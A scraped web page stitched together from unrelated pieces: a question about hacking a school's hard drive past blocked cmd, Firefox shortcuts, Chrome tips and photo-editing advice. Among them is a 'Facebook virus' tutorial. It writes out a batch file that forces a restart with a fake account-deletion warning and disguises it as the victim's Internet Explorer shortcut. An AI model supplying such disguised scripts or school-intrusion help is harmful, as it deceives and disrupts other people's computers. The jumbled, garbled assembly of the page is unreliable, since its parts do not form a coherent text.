1.How to hack into the school's hard drive but now you know that school computer have security and they block command prompt (cmd). What can you do?
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CTRL+A Selects the all items on active page
CTRL+B Display the “Organize Bookmarks” dialog box
CTRL+D Include the active page to your Bookmarks list
CTRL+F Display the “Find” dialog box to search text
CTRL+I Display the Bookmarks pane
CTRL+H Display the History sidebar of Mozilla Firefox
CTRL+N Use to open new Mozilla Firefox page
CTRL+P Use to print the active web page
CTRL+R Use to reload the active web page
CTRL+T Display a new Tab in active Firefox window
CTRL+U View the source code of active web page
CTRL+W Closes the active Mozilla Firefox window
CTRL++ Use to increase the font size of active page
CTRL+ – Use to decrease the font size of active page
CTRL+Tab Move to next Tab in Mozilla Firefox
ALT+B Go to Mozilla Firefox Favorites Menu
ALT+D Go to address bar of current Firefox page
ALT+E Go to Mozilla Firefox Edit Menu
ALT+F Go to Mozilla Firefox File Menu
ALT+S Go to Mozilla Firefox History Menu
ALT+T Go to Mozilla Firefox Tools Menu
ALT+V Go to Mozilla Firefox View Menu
ALT+Home Use to open the home page of internet explorer
ALT+Left Arrow Go to previous page of active page
ALT+Right Arrow Go to next page of active page
Tab Move forward between all items on active web page
F5 Refresh the active web page
F7 F7 activate the cursor to move with keyboard
CTRL+SHIFT+DEL Use to clear all Private Data history
CTRL+SHIFT+D Use to Bookmarks all Firefox Tabs
F11 Press F11 key to view any webpage in full-screen view and then again press for normal view.
In this tutorial I will show you how to make a Facebook virus using simple commands on notepad. .This will make the victim think they have got a virus when they click on an icon such as Internet Explorer .
1) Open notepad
2) Type this in :
@echo off
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."
3)Save as Internet Explorer .bat
4)Right click on Internet Explorer .bat and click Create Shortcut
5)Right click on shorcut and click Properties.
7) Choose Internet Explorer icon or similar , click OK , then click Apply
8)Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:
After five minutes windows will restart , that is all. This is totally harmless and will give you a laugh. Enjoy !
By default, Chrome is a multi-process browser. Yawn! What’s that? Simply, it means that each tab runs as a separate process asking for separate resources from the computer. The current working tab gets the most priority over the others. This was intentionally designed to make web apps run faster in Chrome. This feature makes the browser zippier and more stable even with multiple open tabs.
But if you aren’t a heavy user and use the browser to surf only a single site at a time then disabling multiple processes can free up some CPU resources. To handle each web process Chrome has three settings ““
The default mode; each tab gets an independent process of its own. This increases the rendering of webpages and makes the browser stable as each tab is a separate process from the rest. But it also consumes memory.
One process for each unique website; for instance a user with two tabs open for Gmail and another for MakeUseOf will have the two Google tabs running under the same process.
The simplest mode; all tabs run in a single process, much like the other browsers we have now. This setting frees up memory for other applications. This is what we are looking for.
Create a shortcut for Chrome. Open the Properties tab. Edit the Target field as shown in the picture by appending –single-process to the path.
Similarly you can create two more shortcuts for the other two processes to handle your web sessions in three ways.
This is an offshoot of Google Chrome’s multi-process nature which allows each tab to run separate from the other. This allows us to manage, reload or shut down each tab without affecting the rest of our browsing. All this can be done through the Task Manager. PressShift and Escape to start the task manager or right click on the blue top bar. An unresponsive tab can be shut down without bringing down the browser by a simple press of the End process button.
There is a simple way to tell which browser is using the most resources on your computer. Chrome’s task manager lets you examine the memory use of the opened browsers on your computer irrespective of make. Open task manager and click on the ‘Stats for nerds’ link at the bottom. A new tab opens with detailed memory info for all running browsers. The second part of the page also describes Chrome’s process usage stats.
More for site administrators than for you and me but the resources page has a ton of info to offer. To track the resources used by a web page – right click inside the page. SelectInspect element ““ go to the Resources tab and reload the web page. You can view a list of images, scripts and objects from the web page and you can sort them by size or by loading time.
Do you feel that the size of a text box on any website is not worthy of your thoughts”¦then just place your mouse on the bottom right edge and drag to increase the size. Give MakeUseOf.com’s comment box the first drag.
This bookmarklet from Chromeplugins.org is incredibly useful. The dual view feature is useful when you want to compare two websites or search results side by side. Drag theChrome Split Browser bookmarklet into your bookmarks toolbar. When you click the bookmarklet, it asks you to choose the two websites you want and displays them in a double pane.
On launch, Chrome opens up with the “˜Most visited’ area. But it also lets us set options for starting the day by opening our most favored sites in several tabs at once. Click on the wrench icon (Customize and control Chrome) on the top right corner. Under Options – Basictab we can add the pages we want to open on startup.
After finishing a download, you can copy it to the desktop or to any other folder by a simple drag and drop directly from Google Chrome.
Did I miss any of your favorite tips or tricks? Let us know in the comments and lets help each other create a more sleek Chrome experience.
Windows logo key + RAdd/Remove Programs = appwiz.cpl
Self Por trait in Ottawa
A lot of you have been ask ing me ques tions about pho tog ra phy and how to achieve cer tain effects. While I’m by no means an expert, I’m an avid photog ra pher and I had to chance to exper i ment a lot. I’m also always a teacher at heart and yes, I like talk ing about pho tog ra phy, because I’m sure I can give you some tips and learn from you as well.
So I decided to start the Sat ur day Series again, this time with a focus on pho tog ra phy. A new “les son” will be pub lished every Sat ur day, for a total or ten posts. Enjoy the “Ten Pho tog ra phy Tips”!
Alright, let’s be hon est: yes, I edit all my pic tures. Doesn’t mean I do much though. First, my editing skills aren’t that devel oped, sec ond, I like my pic tures to look nat ural. Indeed, photo edit ing is an art in itself and plenty of pho tog ra phers spent hours devel op ing new tech niques or fol low ing pro cess ing fads.
While exces sive edit ing can not suc cess fully mask improper tech niques and poor pho tog ra phy, a lit tle edit ing can dra mat i cally improve your pictures.
Crop ping — Some thing, all you need a lit tle bit of crop ping to reveal a great pic ture. Trim off the excess, remove the dis trac tions in the back ground and cut down to your main point of focus. You can either keep set dimen sions or get a bit cre ative, it’s up to you. Vir tu ally all main edit ing software have a crop ping func tion, includ ing Flickr (where you can edit with pic tures with Piknik) andPicasa (which is free).
The orig i nal pic | Tada! Cropped… looks better |
Color Bal ance —Color bal ance is the global adjust ment of the inten si ties of the col ors. Basi cally, some times the cam era doesn’t ren der the col ors the way they are because of the color of the light sources: some light bulbs add a yel low color, bright sun makes every thing looks warm, shade turns thing blue-ish etc. The camera’s auto white-balance sys tem is eas ily mis taken. For tu nately, on most cam eras, you can chose a white bal ance man u ally with set tings such as “cloudy’, “sunny”, “flu o res cent” etc. and the cam era will com pen sate accord ingly. You can also cor rect the color bal ance when edit ing your pic tures and even play with it.
The orig i nal pic ture looks reddish | After bal anc ing col ors, lost the red hue |
Straight en ing — Like I explain last week, crooked shots are one of my pet peeve. It’s very easy to set the hori zon set in pic tures if you for got to do it while shoot ing. Sim ply align and rotate the pic ture, and crop a bit if needed. Once again, this is easy to do with the main edit ing soft wares, such as Pho to shop, Light room, Picasa etc.
Mmm… Bit crooked! | Straighter! |
Adjust the Expo sure — When the expo sure is too short, pic tures look dark. If the expo sure is too long, the pic ture looks too bright. You can adjust the expo sure man u ally on most cam eras (look for the “+” or “-“ but tons). You can also cor rect it at the edit ing stage. Warn ing: this can get tricky, so bet ter get this expo sure right when tak ing pictures!
This sun set is overexposed | A more dra matic sun set after adjustments |
Cor rect Red Eyes — Ah, the evil red eye… while it cer tainly add some Hal loween flavour to your por traits, your sub jects may not like it (eh, not every body wants to be an evil vam pire!). The red eye effect occurs when you use the flash: the bright light passes into the eyes of your sub ject through the pupil and reflects. It looks red because of the blood in your eyes. The best way to avoid this effect is to either use ambi ent light or to have the sub ject look away. When edit ing, you will notice numer ous soft ware allow you to remove the red eye effect and make your sub ject look human again. They will thank you, for sure.